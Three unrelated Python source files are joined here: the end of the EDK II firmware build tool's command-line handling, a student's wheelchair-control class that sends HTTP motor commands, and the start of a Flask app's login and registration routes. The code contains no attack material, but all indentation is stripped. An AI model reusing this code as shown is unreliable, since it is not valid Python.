for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
def UpdateBuildCache(self):
all_lib_set = set()
all_mod_set = set()
for Module in self.BuildModules:
Module.CopyModuleToCache()
all_mod_set.add(Module)
for Module in self.HashSkipModules:
Module.CopyModuleToCache()
all_mod_set.add(Module)
for Module in all_mod_set:
for lib in Module.LibraryAutoGenList:
all_lib_set.add(lib)
for lib in all_lib_set:
lib.CopyModuleToCache()
all_lib_set.clear()
all_mod_set.clear()
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
Parser.add_option("--disable-include-path-check", action="store_true", dest="DisableIncludePathCheck", default=False, help="Disable the include path check for outside of package.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
control.py | #NAME: move.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for moving the wheelchair in an intuative manner
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import numpy as np
import threading
import time
import math
import requests
import pygame
from requests import Session
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class Control:
#Received Variables
batteryVoltage = 0
rightMotorCurrent = 0
leftMotorCurrent = 0
status = "NULL"
#Intrinsic Parameters
setSpeed = 0
setAngle = 0
setCommand = "SEND"
bootTime = 8
debug = False
def __init__(self,configuration):
self.connected = False
self.dataAge = time.time()+60
#Load Configuration Variables
try:
self.host = configuration['control']['url']
self.maxSpeed = configuration['control']['maxSpeed']
#Get the details of the log file from the configuration
self.logFilePath = configuration['general']['logFile']
self.logging = True
#Open log file
try:
self.log("INFO = Control class has accessed log file.")
except:
self.logging = False
self.log("ERROR: Unable to access log file when initialising control interface.")
except:
self.log("ERROR = The configuration file cannot be decoded.")
self.gamepadRunning = False
self.gamepad()
#Open Transmission and Receive Log Files
try:
#Initialise Transmit Log
self.transmitLogFilePath = configuration['general']['transmitLog']
transmitLog = open(self.transmitLogFilePath,"w")
transmitLog.write("Date and Time,Speed,Angle,Command Message\n")
transmitLog.close()
#Initialise Receive Log
self.receiveLogFilePath = configuration['general']['receiveLog']
receiveLog = open(self.receiveLogFilePath,"w")
receiveLog.write("Date & Time,Battery Voltage(V),Right Current (A),Left Current (A),Status Message\n")
receiveLog.close()
#Log Entry
self.log("INFO = Opened Log files for transmission and receive data.")
except:
self.log("ERROR = Could not open transmit and receive logs.")
#Send Message and Retrieve Response
self.reset()
self.log("INFO = Control interface initialised succesfully.")
#Logging Function
def log(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.logFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
print(logEntry)
#Receive Log Function
def receiveLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + "," + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.receiveLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Transmit Log Function
def transmitLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.transmitLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Send and Receive Messages with implemented logging
@threaded
def gamepad(self):
topSpeed = 30
try:
pygame.init()
pygame.joystick.init()
#Check number of gamepads
gamepads = pygame.joystick.get_count()
#Log Entry
self.log("INFO = "+str(gamepads)+" gamepads avalible.")
if gamepads > 0:
#Initialise first gamepad
j = pygame.joystick.Joystick(0)
j.init()
#Check axis avalible
axis = j.get_numaxes()
#Log Entry
self.log("INFO = Gamepad with "+str(axis)+" axis has been initiated.")
while 1:
while self.gamepadRunning:
#Get Current Data
pygame.event.get()
xAxisLeft = j.get_axis(0)
yAxisLeft = j.get_axis(1)
aButton = j.get_button(0)
bButton = j.get_button(1)
yButton = j.get_button(2)
xButton = j.get_button(3)
#print("Raw data =",xAxisLeft,",",yAxisLeft)
#Mapped Data for API
speed = int(-yAxisLeft*topSpeed)
angle = int(-xAxisLeft*100)
#On button presses start and stop wheelchair
if aButton == True:
self.reset()
if bButton == True:
self.eStop()
if xButton == True:
topSpeed = topSpeed + 1
if topSpeed > 100:
topSpeed = 100
self.log("INFO = Top Speed is now "+str(topSpeed))
if yButton == True:
topSpeed = topSpeed - 1
if topSpeed < 0:
topSpeed = 0
self.log("INFO = Top Speed is now "+str(topSpeed))
#If new command has been identified then send new data to API
if (self.setSpeed != speed) or (self.setAngle != angle):
self.transmitCommand(speed,angle,"SEND")
#print("Mapped speed is",speed,"and the angle is",angle)
except:
#Log Entry
self.log("STATUS = No Gamepads are avalible. Have you connected any?")
#Converts speed in m/s to arbitary units for commands
def getSpeedValue(self,speed):
#Linear Relationship parmamters for conversion
m = 0.0319
c = -0.1
speedArbitary = int((speed - c)/m)
return speedArbitary
#Converts speed in arbitary unit to metrics
def getSpeedMetric(self,speed):
#Linear Relationship parmamters for conversion
m = 0.0319
c = -0.1
speedMetric = (m*speed)+c
speedMetric = round(speedMetric,2)
return speedMetric
#returns the distance travelled based on the speed
@staticmethod
def distanceTravelled(speed, time):
distance = speed*time
return distance
#parse response
def decodeResponse(self, receivedMessage):
if receivedMessage != "":
data = receivedMessage.split(",")
if len(data) >= 4:
self.batteryVoltage = float(data[2])
self.rightMotorCurrent = float(data[0])
self.leftMotorCurrent = float(data[1])
self.status = data[3]
print("BATTERY ="+str(self.batteryVoltage))
self.dataAge = time.time()
#Determine battery percentage
def batteryPercent(self):
percent = ((self.batteryVoltage - 23.6)/2)*100
percent = round(percent,2)
if percent < 0:
percent = 0
elif percent > 100:
percent = 100
return percent
#Determine Power Consumption (in Watts)
def powerConsumed(self):
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
#Accounting for Baseload Current Consumption (A)
current = 1.25
#Calculation Carried out using simple P=VI Equation
current = current + self.rightMotorCurrent + self.leftMotorCurrent
#P=V*I
power = self.batteryVoltage*current
#Round to 2 Decimal Places
power = round(power,2)
return power
#Speed Ramping Function
def rampSpeed(self,newSpeed,acceleration):
#Update Variables Before Starting
self.getUpdate()
delay = 1/acceleration
delay = int(delay)
command = "RUN"
#Direction Forward
if newSpeed >= 0:
#Accelerate
if newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
self.transmitCommand(speed,self.setAngle,command)
time.sleep(delay)
#Decelerate
elif newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
self.transmitCommand(speed,self.setAngle,command)
time.sleep(delay)
#Direcion Reverse
if newSpeed < 0:
#Accelerate
if newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
#Decelerate
elif newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.log("INFO = Speed has been ramped to "+str(newSpeed)+" with an acceleration of "+str(acceleration))
else:
self.log("ERROR = Wheelchair speed cannot be ramped.")
return newSpeed
#Function to change the turn the wheelchair a specific angle
def turn(self,angle):
factor = 40
if angle < 0:
delay = (-angle)/factor
self.transmitCommand(30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
elif angle > 0:
delay = angle/factor
self.transmitCommand(-30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
else:
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has turned "+str(angle)+" degrees.")
else:
self.log("ERROR = Wheelchair has not turned as requested.")
#Function to change the move the wheelchair a specific distance in meters
def move(self,distance):
factor = 1
delay = int(distance/factor)
self.transmitCommand(30,0,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has moved "+str(distance)+"m.")
else:
self.log("ERROR = Wheelchair cannot be moved.")
#Function to change the move the wheelchair a specific distance in meters
def changeRadius(self,radius):
delay = 0.1
factor = 1
radius = radius/factor
radius = int(radius)
angle = self.setAngle
while radius > self.setAngle:
angle = angle + 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
while radius < self.setAngle:
angle = angle - 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
if self.connected == True:
self.log("INFO = Wheelchair turning radius is now "+str(radius)+"m.")
else:
self.log("ERROR = Wheelchair turning radius cannot be changed.")
#Function to Calculate Speed Lmit bases on the value of the closest point
def changeAngle(self, angle):
command = "SEND"
self.transmitCommand(self.setSpeed,angle,command)
if self.connected == True:
self.setAngle = angle
self.log("INFO = Wheelchair turning angle is now "+str(angle))
else:
self.log("ERROR = Wheelchair angle cannot be changed")
def changeSpeed(self, speed):
speed = int(speed)
command = "SEND"
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.setSpeed = speed
self.log("INFO = Wheelchair speed is now set as "+str(speed))
else:
self.log("ERROR = Wheelchair speed cannot be changed")
#Emergency Stop the wheelchair
def eStop(self):
self.transmitCommand(0,0,"STOP")
if self.connected == True:
self.log("INFO: Wheelchair has Emergency Stopped.")
else:
self.log("ERROR = Warning, the Wheelchair cannot be stopped!")
#Reset the wheelchair
def reset(self):
self.transmitCommand(0,0,"RESET")
if self.connected == True:
self.log("INFO = Wheelchair is being reset.")
for x in range(self.bootTime,0,-1):
self.log("INFO = "+str(x)+" seconds remaining until wheelchair completes boot up.")
time.sleep(1)
else:
self.log("ERROR = Wheelchair cannot be reset.")
#Funtion to Update Variables
def getUpdate(self):
refreshRate = 5
elapsedTime = time.time() - self.dataAge
if elapsedTime > refreshRate:
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
if self.connected == False:
self.log("INFO = Communication link down.")
#Function to Calculate Speed Lmit bases on the value of the closest point
def calcMaxSpeed(self,closestObject):
x = closestObject
a = -5.6593
b = 29.089
c = -5.1123
d = 3.3333
#Third Order Deceleration Custom Profile
maxSpeedNew = (a*math.pow(x,3))+(b*math.pow(x,2))+(c*x)+d
maxSpeedNew = round(maxSpeedNew,2)
self.maxSpeed = int(maxSpeedNew)
#Prevent Speeds higher than the limit set
if self.setSpeed > 0:
speedMagnitude = int(self.setSpeed)
if speedMagnitude > self.maxSpeed:
self.transmitCommand(self.maxSpeed,self.setAngle,"SEND")
#Collision Avoidance Algorithm
@threaded
def collisionAvoidance(self):
while 1:
#If Wheelchair is breaking the Speed Limit (Set by Closest Object)
if self.setSpeed > self.maxSpeed:
#Determine Rate of Decelleration depending on delta
decceleration = self.setSpeed - self.maxSpeed
#Adjust Speed
self.rampSpeed(self.maxSpeed,decceleration)
elif self.setSpeed < self.maxSpeed:
#Determine Rate of Acceleration depending on delta
acceleration = self.maxSpeed - self.setSpeed
#Adjust Speed
self.rampSpeed(self.maxSpeed,acceleration)
#Send and Receive Messages with implemented logging
def transmitCommand(self, speed, angle, command):
#Start Timing
start = time.time()
#Make sure values passed are integars
speed = int(speed)
angle = int(angle)
#Check speed does not exceed limit
if speed > 0:
if speed > self.maxSpeed:
speed = self.maxSpeed
#Create form of the payload
payload = str(speed)+","+str(angle)+","+ command
#combine with host address
message = self.host + payload
try:
response = requests.post(message,timeout=2)
data = response.content.decode("utf-8").split("\r\n")
if self.debug == True:
self.log("INFO = Transmission response code is "+str(response.status_code))
#Write log entry regarding data transmitted
self.transmitLog(str(speed) + "," + str(angle) + "," + command)
if data[0] != "":
#Write log entry regarding response
self.receiveLog(data[0])
self.log("STATUS = Received data is as follows; " + data[0])
#Decode Data
self.decodeResponse(data[0])
if response.status_code == 200:
self.connected = True
self.setSpeed = speed
self.setAngle = angle
self.setCommand = command
if self.debug == True:
end = time.time()
print("STATUS: Sending '",payload,"' took %.2f seconds." % round((end-start),2))
except:
self.log("ERROR = Could not access wheelchair API")
self.connected = False |
routes.py | from app import app, db, mail
from flask import render_template, flash, redirect, url_for, request, jsonify, session
from app.forms import LoginForm, RegistrationForm
from flask_login import current_user, login_user, logout_user, login_required
from flask_mail import Message
from app.models import User, History, Feedback
from werkzeug.urls import url_parse
from datetime import datetime, timedelta
from app.forms import EditProfileForm, UploadForm, PasswordChangeForm, EmailForm, PasswordForm, FeedbackForm
from PIL import Image
from threading import Thread
import time
from itsdangerous import URLSafeTimedSerializer
import hashlib
import datetime as dater
import os
import urllib.request
from werkzeug.utils import secure_filename
import base64
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
import json
import numpy as np
import requests
from .preprocess import load
from flask_cors import CORS
from sqlalchemy.exc import IntegrityError
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
UPLOAD_FOLDER = os.path.join(os.getcwd(), 'uploads')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['UPLOADED_IMAGES_DEST'] = UPLOAD_FOLDER
app.config['UPLOADED_PHOTOS_DEST'] = os.path.join(
os.getcwd(), 'app', 'static', 'profile') # you'll need to create a folder named uploads
photos = UploadSet('photos', IMAGES)
images = UploadSet('images', IMAGES)
configure_uploads(app, photos)
configure_uploads(app, images)
patch_request_class(app) # set maximum file size, default is 16MB
CORS(app)
@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
form = FeedbackForm()
return render_template('index.html', form=form)
@app.route('/', methods=['POST'])
@app.route('/index', methods=['POST'])
def feeds():
form = FeedbackForm()
if form.validate_on_submit():
feedback = Feedback(name=form.name.data, email=form.email.data, message=form.message.data)
db.session.add(feedback)
db.session.commit()
return redirect(url_for('index'))
return render_template('index.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('dashboard'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None or not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
next_page = url_for('dashboard')
return redirect(next_page)
return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('dashboard'))
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data, gender=form.gender.data, profession=form.profession.data)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
send_confirmation_email(user.email)
flash('Congratulations, you are now a registered user!')
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect(url_for('login'))
return render_template('signUp.html', title='Register', form=form)
@app.route('/reset', methods=["GET", "POST"])
def reset():
if current_user.is_authenticated:
return redirect(url_for('dashboard'))
form = EmailForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=form.email.data).first_or_404()
except:
flash('Invalid email address!', 'error')
return render_template('password_reset_email.html', form=form)
if user.email_confirmed:
send_password_reset_email(user.email)
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('login'))
